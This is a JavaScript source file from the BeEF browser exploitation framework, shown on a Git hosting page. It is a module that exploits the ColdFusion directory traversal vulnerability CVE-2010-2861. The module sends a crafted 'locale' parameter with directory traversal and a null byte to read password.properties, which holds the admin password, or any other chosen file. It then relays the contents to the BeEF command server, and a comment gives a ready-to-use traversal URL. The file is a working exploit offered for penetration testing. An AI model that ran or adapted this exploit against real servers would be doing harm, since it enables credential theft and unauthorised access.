Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
2e70f868661fb1c30bd3f3e42e8328c8cde322ba
beef/modules/network/coldfusion_dir_traversal_exploit/command.js
scotty.b.brown@gmail.com 5c3e6f1575 Adding Apache Licence Header to all files (except VERSION file) 
git-svn-id: https://beef.googlecode.com/svn/trunk@1046 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2011-07-02 23:08:28 +00:00

47 lines
2.5 KiB
JavaScript
Raw Blame History

//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/**
* ColdFusion Directory Traversal Exploit (CVE-2010-2861) by antisnatchor .
* Inject into the vulnerable "locale" parameter the classic payload of a directory traversal.
* By default the exploit will retrieve the password.properties file, where the CF admin passwd is stored:
* the user is free to specify any other path that will be appended to the server root (ie C:\ on Windows)
*
* On a default win installation, the following vector works great:
* http://127.0.0.1:8500/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\ColdFusion8\lib\password.properties%00en
* demo CF application-> http://blogs.sitepoint.com/applications-coldfusion-8/
*/
beef.execute(function() {
fileToRetrieve = "<%= @fileToRetrieve %>";
targetOS = "<%= @os_combobox %>";
cf_version = "<%= @cf_version %>";
var uri = null;
if(targetOS == "Windows"){
uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\\ColdFusion' + cf_version + '\\lib\\' + fileToRetrieve + '%00en';
}else{
uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../../opt/coldfusion' + cf_version + '/lib/' + fileToRetrieve + '%00en';
}
beef.net.request("http", "GET", document.domain, document.location.port, uri,null, null, 10, 'text', function(response){
if(response.status_code == "success"){
titleStart = response.response_body.indexOf("<title>");
titleEnd = response.response_body.indexOf("</title>");
exploitResults = response.response_body.substring(titleStart + 7,titleEnd);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=Retrieved contents for file [" + fileToRetrieve + "]: " + exploitResults);
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: directory traversal failed.");
}
});
});
Reference in New Issue View Git Blame Copy Permalink